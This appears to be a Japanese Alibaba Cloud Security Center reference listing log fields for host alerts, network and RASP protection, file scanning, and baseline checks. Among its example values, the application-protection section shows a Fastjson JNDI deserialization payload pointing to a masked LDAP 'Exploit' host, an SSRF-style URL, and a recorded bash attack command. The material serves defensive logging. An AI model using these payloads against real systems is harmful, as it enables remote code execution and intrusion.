データソース。値: aegis_suspicious_event (ホストの異常)、aegis_suspicious_file_v2 (Webshell)、aegis_login_log (異常なログイン)、honeypot (クラウドハニーポットのアラートイベント)、object_scan (ファイル検出の異常)、security_event (Security Center の異常)、sas_ak_leak (AK 漏洩イベント)。

aegis_login_log

detail

詳細なアラートのコンテキストを提供する構造化オブジェクト (JSON)。フィールドはアラートタイプによって異なります。alert_reason フィールドの一般的な値: reason1 (IP が通常のログイン場所のものではない)、reason2 (API 呼び出しの失敗)、reason3 (IP が通常のログイン場所のものではなく、API 呼び出しが失敗した)。

{"loginSourceIp":"221.11.XX.XX","loginDestinationPort":22,"loginUser":"root",...}

instance_id

インスタンス ID。

i-2zeg4zldn8zypsfg****

internet_ip

アセットのパブリック IP アドレス。

39.104.XX.XX

intranet_ip

アセットのプライベート IP アドレス。

192.168.XX.XX

level

アラートイベントのリスクレベル。値: serious (緊急)、suspicious (不審)、remind (注意)。

suspicious

name

アラート名。

Anomalous Logon - ECS Unusual Account Logon

operation

操作。値: new (新規)、dealing (処理中)、update (更新済み)。

new

status

アラートステータス。値:1 (未処理、新規アラートのデフォルト)、2 (無視、無視操作の実行後)、8 (ホワイトリストに登録済み、ホワイトリストへの追加後)、16 (処理中、プロセス終了/ファイル隔離/ホワイトリスト操作中)、32 (処理済み、手動処理またはプロセス終了/ファイル隔離操作の完了後)、64 (期限切れ、30 日以内に操作がない場合)、513 (自動ブロック済み、アラートは Security Center の精密防御機能によって自動的にブロックされており、手動での処理は不要です)。

1

unique_info

アラートの一意の識別子。

2536dd765f804916a1fa3b9516b5****

uuid

アラートが生成されたサーバーの UUID。

ad66133a-dc82-4e5e-9659-a49e3****

start_time

開始タイムスタンプ (秒単位)。イベントが発生した時刻も示します。

1719472214

suspicious_event_id

アラートイベント ID。

650226318

handle_time

操作に対応するタイムスタンプ。

1765272845

alert_first_time

アラートが最初に表示されたときのタイムスタンプ。

1764226915

alert_last_time

アラートが最後に表示されたときのタイムスタンプ。

1765273425

strict_mode

アラートが厳格モードであるかどうかを示します。値: true、false。

true

user_id

アカウント ID。

1358******3357

CSPM - クラウドプラットフォーム設定チェックログ

フィールド

説明

例

check_id

確認項目 ID。この ID は ListCheckResult 操作を呼び出すことで取得できます。

11

check_item_name

確認項目の名前。

Origin fetch configuration

instance_id

インスタンス ID。

i-2zeg4zldn8zypsfg****

instance_name

インスタンス名。

lsm

instance_result

リスクの影響 (JSON 文字列)。

{"Checks":[{}],"Columns":[{"key":"RegionIdShow","search":true,...}]}

instance_sub_type

インスタンスサブタイプ。instance_type の値によって異なります:ECS の場合:INSTANCE、DISK、SECURITY_GROUP。ACR の場合:REPOSITORY_ENTERPRISE、REPOSITORY_PERSON。RAM の場合:ALIAS、USER、POLICY、GROUP。WAF の場合:DOMAIN。その他のタイプの場合:INSTANCE。

INSTANCE

instance_type

インスタンスタイプ。値:Elastic Compute Service (ECS)、Server Load Balancer (SLB)、ApsaraDB RDS (RDS)、ApsaraDB for MongoDB (MONGODB)、ApsaraDB for Redis (KVSTORE)、Container Registry (ACR)、CSK、Virtual Private Cloud (VPC)、ActionTrail (ACTIONTRAIL)、Content Delivery Network (CDN)、Certificate Management Service (CAS)、Apsara DevOps (RDC)、Resource Access Management (RAM)、Anti-DDoS、Web Application Firewall (WAF)、Object Storage Service (OSS)、PolarDB、ApsaraDB RDS for PostgreSQL (POSTGRESQL)、Microservices Engine (MSE)、File Storage NAS (NAS)、Sensitive Data Discovery and Protection (SDDP)、Elastic IP Address (EIP)。

ECS

region_id

インスタンスが存在するリージョン ID。

cn-hangzhou

requirement_id

要件 ID。この ID は ListCheckStandard 操作を呼び出すことで取得できます。

5

risk_level

リスクレベル。値: LOW、MEDIUM、HIGH。

MEDIUM

section_id

セクション ID。この ID は ListCheckResult 操作を呼び出すことで取得できます。

1

standard_id

標準 ID。この ID は ListCheckStandard 操作を呼び出すことで取得できます。

1

status

確認項目ステータス。値: NOT_CHECK (未チェック)、CHECKING (チェック中)、PASS (合格)、NOT_PASS (不合格)、WHITELIST (ホワイトリストに登録済み)。

PASS

vendor

クラウドサービスプロバイダー。固定値: ALIYUN。

ALIYUN

start_time

開始タイムスタンプ (秒単位)。イベントが発生した時刻も示します。

1719472214

ネットワーク防御ログ

フィールド

説明

例

cmd

攻撃されたプロセスのコマンドライン。

nginx: master process nginx

cur_time

攻撃イベントが発生した時刻。

2023-09-14 09:21:59

decode_payload

HEX から文字に変換されたペイロード。

POST /Services/FileService/UserFiles/

dst_ip

攻撃されたアセットの IP アドレス。

172.16.XX.XX

dst_port

攻撃されたアセットのポート。

80

func

インターセプトされたイベントのタイプ。値: payload (悪意のあるペイロードのインターセプト、悪意のあるデータまたはコマンドの検出によってトリガー)、tuple (悪意のある IP のインターセプト、悪意のある IP アクセスの検出によってトリガー)。

payload

rule_type

インターセプトされたイベントの特定のルールタイプ。値: alinet_payload (Security Center によって定義されたペイロードイベント防御ルール)、alinet_tuple (Security Center によって定義されたタプルイベント防御ルール)。

alinet_payload

instance_id

攻撃されたアセットのインスタンス ID。

i-2zeg4zldn8zypsfg****

internet_ip

攻撃されたアセットのパブリック IP アドレス。

39.104.XX.XX

intranet_ip

攻撃されたアセットのプライベート IP アドレス。

192.168.XX.XX

final_action

防御アクション。固定値: block (ブロック済み)。

block

payload

HEX 形式のペイロード。

504f5354202f20485454502f312e310d0a436f6e74656e742d547970653a20746578742f706c61696e0d0a557365722d4167656e743a20****

pid

攻撃されたプロセスの ID。

7107

platform

攻撃されたアセットのシステムタイプ。値: windows、linux。

linux

proc_path

攻撃されたプロセスのパス。

/usr/sbin/nginx

sas_group_name

Security Center 内のサーバーのアセットグループ。

default

src_ip

攻撃の送信元 IP アドレス。

106.11.XX.XX

src_port

攻撃の送信元ポート。

29575

uuid

サーバーの UUID。

5d83b26b-b7ca-4a0a-9267-12****

start_time

開始タイムスタンプ (秒単位)。イベントが発生した時刻も示します。

1719472214

アプリケーション保護ログ

フィールド

説明

例

app_dir

アプリケーションが存在するディレクトリ。

/usr/local/aegis/rasp/apps/1111

app_id

アプリケーション ID。

6492a391fc9b4e2aad94****

app_name

アプリケーション名。

test

confidence_level

検出アルゴリズムの信頼度。値: high、medium、low。

low

request_body

リクエストボディ。

{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://172.220.XX.XX:1389/Exploit","autoCommit":true}

request_content_length

リクエストボディの長さ。

112

data

フックポイントパラメーター。

{"cmd":"bash -c kill -0 -- -'31098' "}

headers

リクエストヘッダー。

{"content-length":"112","referer":"http://120.26.XX.XX:8080/demo/Serial",...}

hostname

ホストまたはネットワークデバイスの名前。

testhostname

host_ip

ホストのプライベート IP アドレス。

172.16.XX.XX

is_cliped

ログが長さ制限を超えたために切り捨てられたかどうかを示します。値: true (切り捨てられた)、false (切り捨てられていない)。

false

jdk_version

JDK バージョン。

1.8.0_292

message

アラートの説明。

Unsafe class serial.

request_method

HTTP リクエストメソッド。

Post

platform

オペレーティングシステムタイプ。

Linux

arch

オペレーティングシステムアーキテクチャ。

amd64

kernel_version

オペレーティングシステムカーネルバージョン。

3.10.0-1160.59.1.el7.x86_64

param

リクエストパラメーター。一般的な形式には、GET パラメーターや application/x-www-form-urlencoded が含まれます。

{"url":["http://127.0.0.1.xip.io"]}

payload

有効な攻撃ペイロード。

bash -c kill -0 -- -'31098'

payload_length

攻撃ペイロードの長さ。

27

rasp_id

RASP プローブの一意の ID。

fa00223c8420e256c0c98ca0bd0d****

rasp_version

RASP プローブのバージョン。

0.8.5

src_ip

リクエスターの IP アドレス。

172.0.XX.XX

final_action

アラート処理結果。値: block (ブロック済み)、monitor (監視中)。

block

rule_action

ルールによって指定されたアラート処理メソッド。値: block、monitor。

block

risk_level

リスクレベル。値: high、medium、low。

high

stacktrace

スタックトレース。

[java.io.FileInputStream.<init>(FileInputStream.java:123), ...]

time

アラートがトリガーされた時刻。

2023-10-09 15:19:15

timestamp

アラートがトリガーされたときのタイムスタンプ (ミリ秒単位)。

1696835955070

type

攻撃タイプ。値: attach (悪意のあるアタッチ)、beans (悪意のある Beans バインディング)、classloader (悪意のあるクラスの読み込み)、dangerous_protocol (危険なプロトコルの使用)、dns (悪意のある DNS クエリ)、engine (エンジンインジェクション)、expression (式インジェクション)、file (悪意のあるファイルの読み書き)、file_delete (任意のファイル削除)、file_list (ディレクトリトラバーサル)、file_read (任意のファイル読み取り)、file_upload (悪意のあるファイルのアップロード)、jndi (JNDI インジェクション)、jni (JNI インジェクション)、jstl (JSTL 任意ファイルインクルード)、memory_shell (メモリ内 Webshell インジェクション)、rce (リモートコード実行)、read_object (デシリアライゼーション攻撃)、reflect (悪意のあるリフレクション)、sql (SQL インジェクション)、ssrf (悪意のあるアウトバウンド接続)、thread_inject (スレッドインジェクション)、xxe (XXE 攻撃)。

rce

url

リクエスト URL。

http://127.0.0.1:999/xxx

rasp_attack_uuid

攻撃イベントの UUID。

18823b23-7ad4-47c0-b5ac-e5f036a2****

uuid

ホスト UUID。

23f7ca61-e271-4a8e-bf5f-165596a16****

internet_ip

ホストのパブリック IP アドレス。

1.2.XX.XX

intranet_ip

ホストのプライベート IP アドレス。

172.16.XX.XX

sas_group_name

Security Center サーバーグループ名。

Group 1

instance_id

ホストインスタンス ID。

i-wz995eivg28f1m**

start_time

開始タイムスタンプ (秒単位)。イベントが発生した時刻も示します。

1719472214

悪意のあるファイル検出ログ

フィールド

説明

例

bucket_name

OSS バケット名。

***-test

event_id

アラート ID。

802210

event_name

アラート名。

Mining program

md5

ファイルの MD5 ハッシュ。

6bc2bc******53d409b1

sha256

ファイルの SHA256 ハッシュ。

f038f9525******7772981e87f85

result

検出結果。値: 0 (ファイルは安全です)、1 (悪意のあるファイルが検出されました)。

0

file_path

ファイルパス。

test.zip/bin_test

etag

OSS ファイル識別子。

6BC2B******853D409B1

risk_level

リスクレベル。値: serious (緊急)、suspicious (不審)、remind (注意)。

remind

source

検出シナリオ。値: OSS (Security Center コンソールを介した OSS バケット内のファイル検出)、API (Java または Python SDK を介した悪意のあるファイル検出)。

OSS

parent_md5

親ファイルまたはアーカイブファイルの MD5 ハッシュ。

3d0f8045bb9******

parent_sha256

親ファイルまたはアーカイブファイルの SHA256 ハッシュ。

69b643d6******a3fb859fa

parent_file_path

親ファイルまたはアーカイブファイルの名前。

test.zip

start_time

開始タイムスタンプ (秒単位)。イベントが発生した時刻も示します。

1719472214

compress_file_number

アーカイブ内のサブファイルのシーケンス番号。[現在]/[合計] の形式です。たとえば、1/10 は、アーカイブ内の 10 ファイルのうちの 1 番目のファイルであることを意味します。

1/10

コアファイル監視イベントログ

フィールド

説明

例

start_time

イベントの最新の発生時刻 (秒単位)。

1718678414

uuid

クライアントの UUID。

5d83b26b-b**a-4**a-9267-12****

file_path

ファイルパス。

/etc/passwd

proc_path

プロセスパス。

/usr/bin/bash

rule_id

一致したルールの ID。

123

rule_name

ルール名。

file_test_rule

cmdline

コマンドライン。

bash /opt/a

operation

ファイルに対して実行された操作。

READ

risk_level

アラートレベル。

2

pid

プロセス ID。

45324

proc_permission

プロセス権限。

rwxrwxrwx

instance_id

インスタンス ID。

i-wz995eivg2****

internet_ip

パブリック IP アドレス。

192.0.2.1

intranet_ip

プライベート IP アドレス。

172.16.0.1

instance_name

インスタンス名。

aegis-test

platform

オペレーティングシステムタイプ。

Linux

エージェントレス検出ログ

共通フィールド

フィールド

説明

例

uuid

サーバーの UUID。

ad66133a-dc82-4e5e-9659-a49e3****

instance_id

インスタンス ID。

i-2zeg4zldn8zypsfg****

internet_ip

アセットのパブリック IP アドレス。

39.104.XX.XX

intranet_ip

アセットのプライベート IP アドレス。

192.168.XX.XX

sas_group_name

Security Center 内のサーバーのアセットグループ。

default

start_time

開始タイムスタンプ (秒単位)。イベントが発生した時刻も示します。

1719472214

脆弱性リスクフィールド

フィールド

説明

例

vul_name

脆弱性名。

imgsca:java:gson:AVD-2022-25647

vul_alias_name

脆弱性のエイリアス。

gson code issue vulnerability (CVE-2022-25647)

vul_primary_id

脆弱性のプライマリキー ID。

990174361

type

脆弱性タイプ。値: sys (Windows システムの脆弱性)、cve (Linux ソフトウェアの脆弱性)、sca (アプリケーションの脆弱性、ソフトウェアコンポーネント分析タイプ)、emg (緊急の脆弱性)。

sca

alert_level

脆弱性リスクレベル。値: asap (高)、later (中)、nntf (低)。

asap

instance_name

ホスト名。

hhht-linux-***

operation

脆弱性に対して実行された操作。値: new (新規)、update (更新済み)。

new

status

脆弱性ステータス。値: 1 (未修正)、7 (修正済み)。

1

tag

脆弱性タグ。値: oval (Linux ソフトウェアの脆弱性)、system (Windows システムの脆弱性)。他の脆弱性タイプのタグはランダムな文字列になります。

oval

ベースラインチェックフィールド

フィールド

説明

例

check_item_name

確認項目の名前。

Set password expiration time

check_item_level

確認項目のリスクレベル。値: high (高)、medium (中)、low (低)。

high

check_type

確認項目のタイプ。

Identity authentication

risk_level

リスクレベル。値: high (高)、medium (中)、low (低)。

low

operation

アクション。値: new (新規)、update (更新済み)。

new

risk_name

リスク項目の名前。

Password policy compliance check

status

確認項目ステータス。値: 1 (不合格)、3 (合格)。

1

sub_type_alias_name

サブタイプのエイリアス。

Alibaba Cloud standard - CentOS Linux 7/8 security baseline

sub_type_name

ベースラインサブタイプ名。有効な値については、「ベースラインタイプとサブタイプのリスト」をご参照ください。

hc_centos7

type_name

ベースラインタイプ名。

hc_best_secruity

type_alias_name

タイプのエイリアス。

Best security practices

container_id

コンテナ ID。

b564567427272d46f9b1cc4ade06a85fdf55075c06fdb870818d5925fa86****

container_name

コンテナ名。

k8s_gamify-answer-bol_gamify-answer-bol-5-6876d5dc78-vf6rb_study-gamify-answer-bol_483a1ed1-28b7-11eb-bc35-00163e01****_0

悪意のあるサンプルフィールド

フィールド

説明

例

alert_level

リスクレベル。値: serious (緊急)、suspicious (不審)、remind (注意)。

suspicious

alert_name

悪意のあるサンプルアラートの名前。

Suspicious Process-SSH-based

operation

アクション。値: new (新規)、update (更新済み)。

new

status

悪意のあるサンプルリスクステータス。値: 0 (未処理)、3 (ホワイトリストに登録済み)。

0

suspicious_event_id

アラートイベント ID。

909361

機密ファイルフィールド

フィールド

説明

例

alert_level

リスクレベル。値: high (高)、medium (中)、low (低)。

high

rule_name

ファイルタイプ名。

Ionic token

file_path

機密ファイルのパス。

/Windows/Microsoft.NET/assembly/GAC_MSIL/System.WorkflowServices/v4.0_4.0.0.0__31bf3856ad36****/System.WorkflowServices.dll

result

チェック結果。

{"result":"[\"[\\\"mysql-uqjtwadmin-xxx"}

付録

ベースラインのタイプとサブタイプのリスト

タイプ名

サブタイプ名

説明

hc_exploit

hc_exploit_redis

高リスクの脅威エクスプロイト: Redis への不正アクセス

hc_exploit_activemq

高リスクの脅威エクスプロイト: ActiveMQ への不正アクセス

hc_exploit_couchdb

高リスクの脅威エクスプロイト: CouchDB への不正アクセス

hc_exploit_docker

高リスクの脅威エクスプロイト: Docker への不正アクセス

hc_exploit_es

高リスクの脅威エクスプロイト: Elasticsearch への不正アクセス

hc_exploit_hadoop

高リスクの脅威エクスプロイト: Hadoop への不正アクセス

hc_exploit_jboss

高リスクの脅威エクスプロイト: JBoss への不正アクセス

hc_exploit_jenkins

高リスクの脅威エクスプロイト: Jenkins への不正アクセス

hc_exploit_k8s_api

高リスクの脅威エクスプロイト: Kubernetes API サーバーへの不正アクセス

hc_exploit_ldap

高リスクの脅威エクスプロイト: LDAP (Windows) への不正アクセス

hc_exploit_ldap_linux

高リスクの脅威エクスプロイト: OpenLDAP (Linux) への不正アクセス

hc_exploit_memcache

高リスクの脅威エクスプロイト: Memcached への不正アクセス

hc_exploit_mongo

高リスクの脅威エクスプロイト: MongoDB への不正アクセス

hc_exploit_pgsql

高リスクの脅威エクスプロイト: PostgreSQL ベースラインへの不正アクセス

hc_exploit_rabbitmq

高リスクの脅威エクスプロイト: RabbitMQ への不正アクセス

hc_exploit_rsync

高リスクの脅威エクスプロイト: rsync への不正アクセス

hc_exploit_tomcat

高リスクの脅威エクスプロイト: Apache Tomcat AJP ファイルインクルードの脆弱性

hc_exploit_zookeeper

高リスクの脅威エクスプロイト: ZooKeeper への不正アクセス

hc_container

hc_docker

Alibaba Cloud 標準: Docker セキュリティベースラインチェック

hc_middleware_ack_master

国際的なセキュリティのベストプラクティス: Kubernetes (ACK) マスターノードのセキュリティベースラインチェック

hc_middleware_ack_node

国際的なセキュリティのベストプラクティス: Kubernetes (ACK) ノードのセキュリティベースラインチェック

hc_middleware_k8s

Alibaba Cloud 標準: Kubernetes マスターのセキュリティベースラインチェック

hc_middleware_k8s_node

Alibaba Cloud 標準: Kubernetes ノードのセキュリティベースラインチェック

cis

hc_suse 15_djbh

MLPS レベル 3: SUSE 15 コンプライアンスベースラインチェック

hc_aliyun_linux3_djbh_l3

MLPS レベル 3: Alibaba Cloud Linux 3 コンプライアンスベースラインチェック

hc_aliyun_linux_djbh_l3

MLPS レベル 3: Alibaba Cloud Linux/Aliyun Linux 2 コンプライアンスベースラインチェック

hc_bind_djbh

MLPS レベル 3: Bind コンプライアンスベースラインチェック

hc_centos 6_djbh_l3

MLPS レベル 3: CentOS Linux 6 コンプライアンスベースラインチェック

hc_centos 7_djbh_l3

MLPS レベル 3: CentOS Linux 7 コンプライアンスベースラインチェック

hc_centos 8_djbh_l3

MLPS レベル 3: CentOS Linux 8 コンプライアンスベースラインチェック

hc_debian_djbh_l3

MLPS レベル 3: Debian Linux 8/9/10 コンプライアンスベースラインチェック

hc_iis_djbh

MLPS レベル 3: IIS コンプライアンスベースラインチェック

hc_informix_djbh

MLPS レベル 3: Informix コンプライアンスベースラインチェック

hc_jboss_djbh

MLPS レベル 3: JBoss コンプライアンスベースラインチェック

hc_mongo_djbh

MLPS レベル 3: MongoDB コンプライアンスベースラインチェック

hc_mssql_djbh

MLPS レベル 3: SQL Server コンプライアンスベースラインチェック

hc_mysql_djbh

MLPS レベル 3: MySQL コンプライアンスベースラインチェック

hc_nginx_djbh

MLPS レベル 3: Nginx コンプライアンスベースラインチェック

hc_oracle_djbh

MLPS レベル 3: Oracle コンプライアンスベースラインチェック

hc_pgsql_djbh

MLPS レベル 3: PostgreSQL コンプライアンスベースラインチェック

hc_redhat 6_djbh_l3

MLPS レベル 3: Red Hat Linux 6 コンプライアンスベースラインチェック

hc_redhat_djbh_l3

MLPS レベル 3: Red Hat Linux 7 コンプライアンスベースラインチェック

hc_redis_djbh

MLPS レベル 3: Redis コンプライアンスベースラインチェック

hc_suse 10_djbh_l3

MLPS レベル 3: SUSE 10 コンプライアンスベースラインチェック

hc_suse 12_djbh_l3

MLPS レベル 3: SUSE 12 コンプライアンスベースラインチェック

hc_suse_djbh_l3

MLPS レベル 3: SUSE 11 コンプライアンスベースラインチェック

hc_ubuntu 14_djbh_l3

MLPS レベル 3: Ubuntu 14 コンプライアンスベースラインチェック

hc_ubuntu_djbh_l3

MLPS レベル 3: Ubuntu 16/18/20 コンプライアンスベースラインチェック

hc_was_djbh

MLPS レベル 3: WebSphere Application Server コンプライアンスベースラインチェック

hc_weblogic_djbh

MLPS レベル 3: WebLogic コンプライアンスベースラインチェック

hc_win 2008_djbh_l3

MLPS レベル 3: Windows 2008 R2 コンプライアンスベースラインチェック

hc_win 2012_djbh_l3

MLPS レベル 3: Windows 2012 R2 コンプライアンスベースラインチェック

hc_win 2016_djbh_l3

MLPS レベル 3: Windows 2016/2019 コンプライアンスベースラインチェック

hc_aliyun_linux_djbh_l2

MLPS レベル 2: Alibaba Cloud Linux/Aliyun Linux 2 コンプライアンスベースラインチェック

hc_centos 6_djbh_l2

MLPS レベル 2: CentOS Linux 6 コンプライアンスベースラインチェック

hc_centos 7_djbh_l2

MLPS レベル 2: CentOS Linux 7 コンプライアンスベースラインチェック

hc_debian_djbh_l2

MLPS レベル 2: Debian Linux 8 コンプライアンスベースラインチェック

hc_redhat 7_djbh_l2

MLPS レベル 2: Red Hat Linux 7 コンプライアンスベースラインチェック

hc_ubuntu_djbh_l2

MLPS レベル 2: Ubuntu 16/18 コンプライアンスベースラインチェック

hc_win 2008_djbh_l2

MLPS レベル 2: Windows 2008 R2 コンプライアンスベースラインチェック

hc_win 2012_djbh_l2

MLPS レベル 2: Windows 2012 R2 コンプライアンスベースラインチェック

hc_win 2016_djbh_l2

MLPS レベル 2: Windows 2016/2019 コンプライアンスベースラインチェック

hc_aliyun_linux_cis

国際的なセキュリティのベストプラクティス: Alibaba Cloud Linux/Aliyun Linux 2 セキュリティベースラインチェック

hc_centos 6_cis_rules

国際的なセキュリティのベストプラクティス: CentOS Linux 6 セキュリティベースラインチェック

hc_centos 7_cis_rules

国際的なセキュリティのベストプラクティス: CentOS Linux 7 セキュリティベースラインチェック

hc_centos 8_cis_rules

国際的なセキュリティのベストプラクティス: CentOS Linux 8 セキュリティベースラインチェック

hc_debian 8_cis_rules

国際的なセキュリティのベストプラクティス: Debian Linux 8 セキュリティベースラインチェック

hc_ubuntu 14_cis_rules

国際的なセキュリティのベストプラクティス: Ubuntu 14 セキュリティベースラインチェック

hc_ubuntu 16_cis_rules

国際的なセキュリティのベストプラクティス: Ubuntu 16/18/20 セキュリティベースラインチェック

hc_win 2008_cis_rules

国際的なセキュリティのベストプラクティス: Windows Server 2008 R2 セキュリティベースラインチェック

hc_win 2012_cis_rules

国際的なセキュリティのベストプラクティス: Windows Server 2012 R2 セキュリティベースラインチェック

hc_win 2016_cis_rules

国際的なセキュリティのベストプラクティス: Windows Server 2016/2019 セキュリティベースラインチェック

hc_kylin_djbh_l3

MLPS レベル 3: Kylin コンプライアンスベースラインチェック

hc_uos_djbh_l3

MLPS レベル 3: UOS コンプライアンスベースラインチェック

hc_best_security

hc_aliyun_linux

Alibaba Cloud 標準: Alibaba Cloud Linux/Aliyun Linux 2 セキュリティベースラインチェック

hc_centos 6

Alibaba Cloud 標準: CentOS Linux 6 セキュリティベースラインチェック

hc_centos 7

Alibaba Cloud 標準: CentOS Linux 7/8 セキュリティベースラインチェック

hc_debian

Alibaba Cloud 標準: Debian Linux 8/9/10 セキュリティベースラインチェック

hc_redhat 6

Alibaba Cloud 標準: Red Hat Linux 6 セキュリティベースラインチェック

hc_redhat 7

Alibaba Cloud 標準: Red Hat Linux 7/8 セキュリティベースラインチェック

hc_ubuntu

Alibaba Cloud 標準: Ubuntu セキュリティベースラインチェック

hc_windows_2008

Alibaba Cloud 標準: Windows 2008 R2 セキュリティベースラインチェック

hc_windows_2012

Alibaba Cloud 標準: Windows 2012 R2 セキュリティベースラインチェック

hc_windows_2016

Alibaba Cloud 標準: Windows 2016/2019 セキュリティベースラインチェック

hc_db_mssql

Alibaba Cloud 標準: SQL Server セキュリティベースラインチェック

hc_memcached_ali

Alibaba Cloud 標準: Memcached セキュリティベースラインチェック

hc_mongodb

Alibaba Cloud 標準: MongoDB 3.x セキュリティベースラインチェック

hc_mysql_ali

Alibaba Cloud 標準: MySQL セキュリティベースラインチェック

hc_oracle

Alibaba Cloud 標準: Oracle 11g セキュリティベースラインチェック

hc_pgsql_ali

Alibaba Cloud 標準: PostgreSQL セキュリティベースラインチェック

hc_redis_ali

Alibaba Cloud 標準: Redis セキュリティベースラインチェック

hc_apache

Alibaba Cloud 標準: Apache セキュリティベースラインチェック

hc_iis_8

Alibaba Cloud 標準: IIS 8 セキュリティベースラインチェック

hc_nginx_linux

Alibaba Cloud 標準: Nginx セキュリティベースラインチェック

hc_suse 15

Alibaba Cloud 標準: SUSE Linux 15 セキュリティベースラインチェック

tomcat 7

Alibaba Cloud 標準: Apache Tomcat セキュリティベースラインチェック

weak_password

hc_mongodb_pwd

弱いパスワード: MongoDB ログインの弱いパスワード検出 (バージョン 2.x)

hc_weakpwd_ftp_linux

弱いパスワード: FTP ログインの弱いパスワードチェック

hc_weakpwd_linux_sys

弱いパスワード: Linux システムログインの弱いパスワードチェック

hc_weakpwd_mongodb 3

弱いパスワード: MongoDB ログインの弱いパスワード検出

hc_weakpwd_mssql

弱いパスワード: SQL Server データベースログインの弱いパスワードチェック

hc_weakpwd_mysql_linux

弱いパスワード: MySQL データベースログインの弱いパスワードチェック

hc_weakpwd_mysql_win

弱いパスワード: MySQL データベースログインの弱いパスワードチェック (Windows)

hc_weakpwd_openldap

弱いパスワード: OpenLDAP ログインの弱いパスワードチェック

hc_weakpwd_oracle

弱いパスワード: Oracle ログインの弱いパスワード検出

hc_weakpwd_pgsql

弱いパスワード: PostgreSQL データベースログインの弱いパスワードチェック

hc_weakpwd_pptp

弱いパスワード: pptpd サービスログインの弱いパスワードチェック

hc_weakpwd_redis_linux

弱いパスワード: Redis データベースログインの弱いパスワードチェック

hc_weakpwd_rsync

弱いパスワード: rsync サービスログインの弱いパスワードチェック

hc_weakpwd_svn

弱いパスワード: SVN サービスログインの弱いパスワードチェック

hc_weakpwd_tomcat_linux

弱いパスワード: Apache Tomcat コンソールの弱いパスワードチェック

hc_weakpwd_vnc

弱いパスワード: VNC Server の弱いパスワードチェック

hc_weakpwd_weblogic

弱いパスワード: WebLogic 12c ログインの弱いパスワード検出

hc_weakpwd_win_sys

弱いパスワード: Windows システムログインの弱いパスワードチェック